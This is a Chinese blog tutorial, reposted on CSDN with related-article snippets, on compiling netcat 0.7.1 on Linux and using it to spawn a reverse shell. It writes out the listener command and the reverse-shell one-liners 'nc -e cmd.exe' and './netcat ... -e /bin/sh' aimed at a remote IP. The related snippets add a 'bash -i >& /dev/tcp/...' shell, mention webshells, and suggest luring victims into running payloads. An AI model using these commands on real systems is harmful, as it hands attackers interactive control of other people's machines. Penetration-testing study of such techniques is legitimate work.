linux下编译netcat并且反弹cmdshell

最新推荐文章于 2024-06-05 15:36:25 发布
最新推荐文章于 2024-06-05 15:36:25 发布
阅读量513 收藏
点赞数
分类专栏: WEB安全
本文介绍如何在Linux环境下编译并使用Netcat工具实现远程命令执行。包括下载源码、编译安装步骤及如何创建反向Shell的具体操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

• 2012/10/21  作者: admin

linux下编译netcat并且反弹cmdshell

本地Windows监听
nc -vv -l -p 1234               
 
 首先从sf上get一个tar的压缩包
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
然后当然是解压了
tar zxvf netcat-0.7.1.tar.gz
 解压完毕之后会生成目录,要cd进去
cd netcat-0.7.1
然后进行编译前的配置。
./configure
 配置完了之后就可以make编译了。
 编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图
本地Windows监听
nc -vv -l -p 1234                                                                               
 
 
远程Windows转发
nc -t -e C:WINDOWSsystem32cmd.exe 8.8.8.8 1234
 
远程Linux转发
./netcat  8.8.8.8  1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php

 ———————NetCat for linux 参数e————————-
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句话反弹命令
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
[Bash]

 

[PERL]

 

[Python]

 

[PHP]

 

[Ruby]

 

[Netcat]

 

原文:http://blog.xxgo.org/technology/linuxbackshellwithnc.html
本文由 网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理,转载请注明出处。
反弹shell原理与实现
悦分享
08-02 3625
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
反弹shell的各种姿势
热门推荐
08-12 2万+
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i &gt...
linux 静态编译netcat,交叉编译netcat在路由器上使用 - 从入门到放弃再到success
weixin_42117622的博客
05-06 1354
0x00 路由器架构Author : SparrowTime : 2017-11-27 22:25:51Router Model : RT-N12Router CPU : MIPS32admin@RT-N12:/tmp/home/rootcat /proc/cpuinfosystem type : Broadcom BCM53572 chip rev 1 pkg 8proc...
编译netcat
TSZ0000的博客
05-29 1676
下载软件netcat-0.7.1,拷贝到Linux系统并解压: [yubo.wang@localhost netcat-0.7.1]$ mkdir build [yubo.wang@localhost netcat-0.7.1]$ cd build/ [yubo.wang@localhost netcat-0.7.1]$ ../configure --host=arm-linux --pref...
网猫:netcat编译无病毒
07-04
网上下载的netcat大多都会被杀毒软件检测到有木马程序,幸好他的源文件还是正常可用的,于是我重新编译了,上传上来供大家使用。
Linux 编译安装安装netcat
LoweMuo_洛漠
03-06 1480
下载 wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/ 解压 将 netcat-0.7.1.tar.gz 解压到 /usr/local 目录下 tar -zxvf netcat-0.7.1.tar.gz -C /usr/local 重命名 cd /usr/local mv netcat-0.7.1 netcat 配...
linux 静态编译netcat,linux上安装netcat
weixin_39581972的博客
05-06 929
安装方式一:yum安装yum install -y netcat或者yum install -y nc安装方式二:编译安装1.下载https://download.youkuaiyun.com/download/z1941563559/105778792.上传到linux服务器并解压进入netcat-0.7.1.tar.gz所在目录,并执行下面的命令:tar -zxvf netcat-0.7.1.tar.gz...
阿一网络安全培训中心带你回顾Windos/Linux 反弹 shell
qq_69775412的博客
06-05 946
最近都在打内网,就从最基础的知识开始学习、整理。
Netcat工具的玩法
一醉一休的博客
08-10 1634
之所以叫Netcat,是因为它是在网络上的cat,cat的功能是读取一个文件的内容并输出到屏幕前,netcat也是如此,从网络的一端读取数据,输出到网络的另一端(可以使用TCP和UDP协议)
linux提权思路总结
weixin_43199413的博客
07-20 1468
linux提权思路总结 前言 说到提权,首先需要获得网站的webshell权限,再说提权的操作。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell就是网站管理员,只有站长才可以提升你的权限。 除非你用不正当手法入侵网
NC反弹CMD.EXE
04-20
NC反弹CMD
GNU_netcat.tar.zip
09-11
官方netcat-0.7.1的tar文件包,小巧精干,用过都说好。
socat 2.0交叉编译下载
05-24
编译OK,里面的socat直接可以用。
Linux编译netcat
04-14 1437
很简单。注释掉 netcat.c res_init 的那行make linux如何想编译出 -e 和 -t 选项, 只要加上两条define 语句即可。#define GAPING_SECURITY_HOLE#define TELNET 
netcat
木牛的博客
03-09 235
说明:该指令将尝试连接traget的20-250,500-600,5990-7000端口;说明:当未指定参数运行netcat时,netcat打印Cmd line提示用户输入命令参数,随后从stdin读取一行内容,并将其分解为参数。1 当netcat接收到入站udp连接时,它会创建一个“连接的套接字”返回到连接的源(udp反向连接回去),然后使用write()发送数据。2 基于这个特性,当客户端中断udp连接后再次连接时源端口发生改变,此时服务端将不再接收连接,除非指定源端口为最初的端口。
netcat 反弹shell
weixin_40328085的博客
09-18 413
第一种情况:用 bash -i 客户机:netcat -l -p 7777 服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1 >& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道) 0&gt...
netcat 实现shell反弹
u011975363的专栏
03-29 1521
反弹shell,效果类似于远程控制,当你连接上对方时,对方就控制了你的电脑,可执行你权限范围内的所有操作。 实现过程,受害者运行了攻击者给的相关代码后,主动与攻击者的服务器建立连接,使得攻击者成功控制受害者主机。 telnet,ssh为正向连接,由控制方去连接被控制方。 主机1 输入 主机2 输入 当输入ifconfig时可以查看到主机1的Ip信息说明反弹成功。...
如何在linux编译netcat并且反弹cmdshell
得峰的专栏 [网络收藏]
06-28 613
etcat-0.7.1.tar.gz然后当然是解压了tar zxvf netcat-0.7.1.tar.gz 解压完毕之后会生成目录,要cd进去cd netcat-0.7.1然后进行编译前的配置。./configure 配置完了之后就可以make编译了。 编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图 本地Windows监听nc -vv -...
nc工具
最新发布
03-20
### 关于 Netcat 工具的使用方法 Netcat (`nc`) 是一种功能强大且灵活的网络工具,能够实现多种用途,例如文件传输、端口扫描以及远程控制等。以下是关于如何下载和使用的详细介绍。 #### 下载与安装 对于 Linux 系统,可以通过包管理器来安装 `netcat` 或者它的替代品 `nmap-ncat`: ```bash sudo apt-get update && sudo apt-get install nmap # Debian/Ubuntu sudo yum install -y nmap # CentOS/RHEL/Fedora ``` 如果目标是在 Windows 上运行,则可以直接从 Kali 提供的路径 `/usr/share/windows-binaries/nc.exe` 获取预编译版本[^4]。 #### 基本语法结构 Netcat 支持两种模式——客户端和服务端: - **作为客户端**: 主动发起连接至另一台机器上的开放端口。 ```bash nc [选项] <主机名/IP地址> <端口号> ``` - **作为服务端**: 被动监听来自外部设备的请求。 ```bash nc -l [-p 端口号] [其他参数] ``` 具体实例展示如下: ##### 创建简单的 TCP 数据交换场景 假设 A 和 B 需要互相通信: 1. 在一方启动侦听进程(比如B),等待A接入: ```bash nc -lvnp 12345 # 设定本地监听特定端口(-p),并保持持久化状态(-n,-v) ``` 2. 让第二方(A)主动建立联系: ```bash nc IP_of_B 12345 # 替换IP_of_B为目标计算机的实际数值 ``` 此时双方均进入交互界面,任何输入都会实时传递给对方显示出来。 #### 特殊应用场景举例 除了基本的数据流处理外,还有许多高级操作可供探索,像下面这些例子所示: - 文件上传/下载 通过管道机制完成批量资料搬运工作。 发送文件的一侧执行命令:`type filename | nc -w 3 target_IP port_number` 接收文件的那一边则需提前布置好环境准备接纳传入的信息流:`nc -l -p chosen_port > saved_file_name` - 执行命令回显攻击模拟演练 构建简易shell会话通道以便进一步渗透测试研究之用。 设置反弹Shell脚本:`nc -nvlp reverse_shell_port -e cmd_interpreter_path` 触发该行为的方式取决于具体情况而有所不同;可能涉及社会工程学手段诱导受害者点击恶意链接或者运行伪装后的可执行程序等等。 --- ### 注意事项 尽管 Netcat 功能多样,但在实际部署过程中务必遵循网络安全准则,防止滥用造成不良后果。另外值得注意的是现代操作系统自带的安全防护措施可能会干扰上述某些技术的应用效果,请酌情调整策略加以应对。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值